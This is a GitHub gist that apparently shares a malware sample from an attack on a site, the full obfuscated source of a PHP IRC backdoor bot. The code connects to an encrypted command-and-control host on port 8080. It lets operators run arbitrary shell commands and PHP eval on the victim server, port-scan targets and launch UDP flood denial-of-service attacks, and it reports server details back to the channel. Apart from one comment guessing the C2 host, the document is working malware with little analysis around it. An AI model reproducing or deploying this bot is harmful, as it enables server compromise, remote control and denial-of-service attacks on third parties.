Last active
December 30, 2019 05:33
-
-
Save toddtreece/8152233 to your computer and use it in GitHub Desktop.
sparkfun attack 12-27-13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php set_time_limit(0); error_reporting(0); class FZjJrBjJJZfjFnzFf { | |
var $BvNfVZJNBNjVNvz = array("JFJBfVJnRRzvbZzJ"=>"dXdkZ31kej5geHk7e30=", | |
"zvvF"=>"8080", | |
"nVnBV"=>"scary", | |
"zjnNFn"=>"13", | |
"HhLxP"=>"#ngrz", | |
"vBf"=>"scan", | |
"FzvzFJrrj"=>"bf4b3ba0692b4378406f3df1df1e326a", | |
"NrVzbznZJJ"=>".", | |
"rzZvbbnfbjf"=>"90c83c5174ae2098c64393e576a10048"); | |
var $zRFfVVnrfzzjBRBVBr = array(); | |
var $key = array("key_a"=>"WbvUtpu0WMM5i8mMDzlP5Thyy","key_b"=>"gL5Ax7nyt7SIrIv3kqbiDNM2Z","key_c"=>"rXJzm7FY26lZjKigsRx1drbut"); | |
function UQiEeyUmuAIqYuyu() { | |
$HpdTpD = '[abcdefghijklm)nopqrstuvwxyz_ABCDEFGHIJKLM(NOPQRSTUVWXYZ-0123456789]'; | |
$tHXhLLT = strlen($HpdTpD); | |
for($T=0;$T<$this->BvNfVZJNBNjVNvz['zjnNFn'];$T++) { | |
$umA .= $HpdTpD[rand(0,$tHXhLLT-1)]; | |
} | |
$this->QUqueMM("NICK ".$umA.""); | |
} | |
function uIQyaqIqMy($Xx,$tLx) | |
{ | |
$this->QUqueMM("NOTICE $Xx :$tLx"); | |
} | |
function QymAyMmuEAQM($lhPH) | |
{ | |
if(isset($this->zRFfVVnrfzzjBRBVBr[$lhPH])) | |
return 1; | |
else | |
return 0; | |
} | |
function qAaQuQMYYauqaQemYa($lhPH,$pDHttXtPdT,$mQeQ) { | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002UdpFlood Gestart!\002]"); | |
$PTPtdPLXp = ""; | |
for($T=0;$T<$pDHttXtPdT;$T++) { $PTPtdPLXp .= chr(mt_rand(1,256)); } | |
$ThpHp = time(); | |
$T = 0; | |
while(time()-$ThpHp < $mQeQ) { | |
$Np=fsockopen("udp://".$lhPH,mt_rand(0,6000),$e,$s,5); | |
fwrite($Np,$PTPtdPLXp); | |
fclose($Np); | |
$T++; | |
} | |
$zGP = $T * $pDHttXtPdT; | |
$zGP = $zGP / 1048576; | |
$hVC = $zGP / $mQeQ; | |
$hVC = round($hVC); | |
$zGP = round($zGP); | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002UdpFlood Afgerond!\002]: $zGP MB verzonden / gemiddelde: $hVC MB/s "); | |
} | |
function mUMAIemiuqi($Xx,$tLx) | |
{ | |
$this->QUqueMM("PRIVMSG $Xx :$tLx"); | |
} | |
function QaEUaI($HhLxP,$vBf=NULL) | |
{ | |
$this->QUqueMM("JOIN $HhLxP $vBf"); | |
} | |
function eaiAYmuqM($lhPH) | |
{ | |
$this->zRFfVVnrfzzjBRBVBr[$lhPH] = true; | |
} | |
function MMeIaQyAaAAQmu() | |
{ | |
while(!feof($this->wwgGsCWsk)) | |
{ | |
$this->auuyy = trim(fgets($this->wwgGsCWsk,512)); | |
$bnfznjJFbrRVj = explode(" ",$this->auuyy); | |
if(substr($this->auuyy,0,6)=="PING :") | |
{ | |
$this->QUqueMM("PONG :".substr($this->auuyy,6)); | |
} | |
if(isset($bnfznjJFbrRVj[1]) && $bnfznjJFbrRVj[1] =="004") | |
{ | |
$this->QUqueMM("JOIN ".$this->BvNfVZJNBNjVNvz['HhLxP']." ".$this->BvNfVZJNBNjVNvz['vBf'].""); | |
$this->QaEUaI($this->BvNfVZJNBNjVNvz['HhLxP'],$this->BvNfVZJNBNjVNvz['vBf']); | |
$this->eImyUaqEeYMaUaaYUyM(); | |
} | |
if(isset($bnfznjJFbrRVj[1]) && $bnfznjJFbrRVj[1]=="433") | |
{ | |
$this->UQiEeyUmuAIqYuyu(); | |
} | |
if($this->auuyy != $FnF_PPl) | |
{ | |
$RvJbVrNjRjfVNv = array(); | |
$oKs = substr(strstr($this->auuyy," :"),2); | |
$KCgs = explode(" ",$oKs); | |
$SoCkc = explode("!",$bnfznjJFbrRVj[0]); | |
$WkSCsk = explode("@",$SoCkc[1]); | |
$WkSCsk = $WkSCsk[1]; | |
$SoCkc = substr($SoCkc[0],1); | |
$sgcwGck = $bnfznjJFbrRVj[0]; | |
if($KCgs[0]==$this->SoCkc) | |
{ | |
for($T=0;$T<count($KCgs);$T++) | |
$RvJbVrNjRjfVNv[$T] = $KCgs[$T+1]; | |
} | |
else | |
{ | |
for($T=0;$T<count($KCgs);$T++) | |
$RvJbVrNjRjfVNv[$T] = $KCgs[$T]; | |
} | |
if(count($bnfznjJFbrRVj)>2) | |
{ | |
switch($bnfznjJFbrRVj[1]) | |
{ | |
case "QUIT": | |
if($this->QymAyMmuEAQM($sgcwGck)) | |
{ | |
$this->QUMaQayu($sgcwGck); | |
} | |
break; | |
case "PART": | |
if($this->QymAyMmuEAQM($sgcwGck)) | |
{ | |
$this->QUMaQayu($sgcwGck); | |
} | |
break; | |
case "PRIVMSG": | |
if(!$this->QymAyMmuEAQM($sgcwGck) && (md5($WkSCsk) == $this->BvNfVZJNBNjVNvz['rzZvbbnfbjf'] || $this->BvNfVZJNBNjVNvz['rzZvbbnfbjf'] == "*")) | |
{ | |
if(substr($RvJbVrNjRjfVNv[0],0,1)==$this->BvNfVZJNBNjVNvz['NrVzbznZJJ']) | |
{ | |
switch(substr($RvJbVrNjRjfVNv[0],1)) | |
{ | |
case "user": | |
if(md5($RvJbVrNjRjfVNv[1])==$this->BvNfVZJNBNjVNvz['FzvzFJrrj']) | |
{ | |
$this->eaiAYmuqM($sgcwGck); | |
} | |
else | |
{ | |
$this->uIQyaqIqMy($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002Auth\002]: Fout password $SoCkc idioot!!"); | |
} | |
break; | |
} | |
} | |
} | |
elseif($this->QymAyMmuEAQM($sgcwGck)) | |
{ | |
if(substr($RvJbVrNjRjfVNv[0],0,1)==$this->BvNfVZJNBNjVNvz['NrVzbznZJJ']) | |
{ | |
switch(substr($RvJbVrNjRjfVNv[0],1)) | |
{ | |
case "exec": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = exec($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
case "sexec": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = shell_exec($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
case "eval": | |
$eval = eval(substr(strstr($oKs,$RvJbVrNjRjfVNv[1]),strlen($RvJbVrNjRjfVNv[1]))); | |
break; | |
case "system": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = system($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
case "dns": | |
if(isset($RvJbVrNjRjfVNv[1])) | |
{ | |
$Os = explode(".",$RvJbVrNjRjfVNv[1]); | |
if(count($Os)==4 && is_numeric($Os[0]) && is_numeric($Os[1]) && is_numeric($Os[2]) && is_numeric($Os[3])) | |
{ | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002dns\002]: ".$RvJbVrNjRjfVNv[1]." => ".gethostbyaddr($RvJbVrNjRjfVNv[1])); | |
} | |
else | |
{ | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002dns\002]: ".$RvJbVrNjRjfVNv[1]." => ".gethostbyname($RvJbVrNjRjfVNv[1])); | |
} | |
} | |
break; | |
case "logout": | |
$this->QUMaQayu($sgcwGck); | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002Auth\002]\00314 Je bent nu uitgelogt $SoCkc"); | |
break; | |
case "rndnick": | |
$this->UQiEeyUmuAIqYuyu(); | |
break; | |
case "info": | |
$this->eImyUaqEeYMaUaaYUyM(); | |
break; | |
case "raw": | |
$this->QUqueMM(strstr($oKs,$RvJbVrNjRjfVNv[1])); | |
break; | |
case "restart": | |
$this->QUqueMM("QUIT :gerestart door $SoCkc"); | |
fclose($this->wwgGsCWsk); | |
$this->QmQIYIUuumeYu(); | |
break; | |
case "die": | |
$this->QUqueMM("QUIT :die command from $SoCkc"); | |
fclose($this->wwgGsCWsk); | |
exit; | |
case "passthru": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = passthru($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
case "pscan": | |
if(count($RvJbVrNjRjfVNv) > 2) | |
{ | |
if(fsockopen($RvJbVrNjRjfVNv[1],$RvJbVrNjRjfVNv[2],$e,$s,15)) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002pscan\002]: ".$RvJbVrNjRjfVNv[1].":".$RvJbVrNjRjfVNv[2]." is \2open\2"); | |
else | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002pscan\002]: ".$RvJbVrNjRjfVNv[1].":".$RvJbVrNjRjfVNv[2]." is \2closed\2"); | |
} | |
break; | |
case "udpflood": | |
if(count($RvJbVrNjRjfVNv)>3) | |
{ | |
$this->qAaQuQMYYauqaQemYa($RvJbVrNjRjfVNv[1],$RvJbVrNjRjfVNv[2],$RvJbVrNjRjfVNv[3]); | |
} | |
break; | |
} | |
} | |
} | |
break; | |
} | |
} | |
} | |
$FnF_PPl = $this->auuyy; | |
} | |
$this->QmQIYIUuumeYu(); | |
} | |
function QUqueMM($tLx) | |
{ | |
fwrite($this->wwgGsCWsk,"$tLx\r\n"); | |
} | |
function QMeuUiMqMmqMaeeYY() { | |
$HpdTpD = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; | |
$tHXhLLT = strlen($HpdTpD); | |
for($T=0;$T<6;$T++) { | |
$umA .= $HpdTpD[rand(0,$tHXhLLT-1)]; | |
} | |
if(php_uname() == "") { $dHDdDxPL = "---"; } else { $dHDdDxPL = php_uname(); } | |
$this->QUqueMM("USER ".$umA."-go 127.0.0.1 localhost :".$dHDdDxPL.""); | |
} | |
function QmQIYIUuumeYu() | |
{ | |
if(!($this->wwgGsCWsk = fsockopen(decrypt($this->BvNfVZJNBNjVNvz['JFJBfVJnRRzvbZzJ'],$this->key['key_a']),$this->BvNfVZJNBNjVNvz['zvvF'],$e,$s,30))) | |
$this->QmQIYIUuumeYu(); | |
$this->QMeuUiMqMmqMaeeYY(); | |
if(strlen($this->BvNfVZJNBNjVNvz['nVnBV'])>0) | |
$this->QUqueMM("PASS ".$this->BvNfVZJNBNjVNvz['nVnBV']); | |
$this->UQiEeyUmuAIqYuyu(); | |
$this->MMeIaQyAaAAQmu(); | |
} | |
function QUMaQayu($lhPH) | |
{ | |
unset($this->zRFfVVnrfzzjBRBVBr[$lhPH]); | |
} | |
function eImyUaqEeYMaUaaYUyM() { | |
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $dxdxdThxhxD = "\0034ON\003"; } else { $dxdxdThxhxD = "\0039OFF\003"; } | |
$dHDdDxPL = php_uname(); | |
if($dHDdDxPL == "") { $nVWKPl = "\00315---\003"; } else { $nVWKPl = "\00315".$dHDdDxPL."\003"; } | |
$Nfgw = "\00315http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\003"; | |
$hXOOO = getcwd().""; | |
$hscO = "\00315".$hXOOO."\003"; | |
$WsGsgKcSKO = fileperms("$hXOOO"); | |
if (($WsGsgKcSKO & 0xC000) == 0xC000) { $WOwwCosOckk = 's'; | |
} elseif (($WsGsgKcSKO & 0xA000) == 0xA000) { $WOwwCosOckk = 'l'; | |
} elseif (($WsGsgKcSKO & 0x8000) == 0x8000) { $WOwwCosOckk = '-'; | |
} elseif (($WsGsgKcSKO & 0x6000) == 0x6000) { $WOwwCosOckk = 'b'; | |
} elseif (($WsGsgKcSKO & 0x4000) == 0x4000) { $WOwwCosOckk = 'd'; | |
} elseif (($WsGsgKcSKO & 0x2000) == 0x2000) { $WOwwCosOckk = 'c'; | |
} elseif (($WsGsgKcSKO & 0x1000) == 0x1000) { $WOwwCosOckk = 'p'; | |
} else { $WOwwCosOckk = 'u'; } | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0100) ? 'r' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0080) ? 'w' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0040) ? (($WsGsgKcSKO & 0x0800) ? 's' : 'x' ) : (($WsGsgKcSKO & 0x0800) ? 'S' : '-')); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0020) ? 'r' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0010) ? 'w' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0008) ? (($WsGsgKcSKO & 0x0400) ? 's' : 'x' ) : (($WsGsgKcSKO & 0x0400) ? 'S' : '-')); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0004) ? 'r' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0002) ? 'w' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0001) ? (($WsGsgKcSKO & 0x0200) ? 't' : 'x' ) : (($WsGsgKcSKO & 0x0200) ? 'T' : '-')); | |
$jflP = "\00315".$WOwwCosOckk."\003"; | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"\00314[SAFE:\003\002 $dxdxdThxhxD\002\00314]\00315 $Nfgw \00314[pwd:]\00315 $hscO \00314(\003$jflP\00314) [uname:]\00315 $nVWKPl"); | |
} | |
} | |
function decrypt($text, $key = '') { | |
if ($key == '') { return $text; } $text = base64_decode($text); | |
$key = str_replace(' ', '', $key); if (strlen($key) < 8) { exit('key error'); } | |
$key_len = strlen($key); if ($key_len > 32) { $key_len = 32; } | |
$key = substr($key, 0, $key_len); $text_len = strlen($text); | |
$lomask = str_repeat("\x1f", $text_len); $himask = str_repeat("\xe0", $text_len); | |
$k = str_pad("", $text_len, $key); $text = (($text ^ $k) & $lomask) | ($text & $himask); | |
return $text; | |
} | |
$GskCscoG = new FZjJrBjJJZfjFnzFf; | |
$GskCscoG->QmQIYIUuumeYu(); ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
i think this is trying to connect to burrito.wut.re port 8080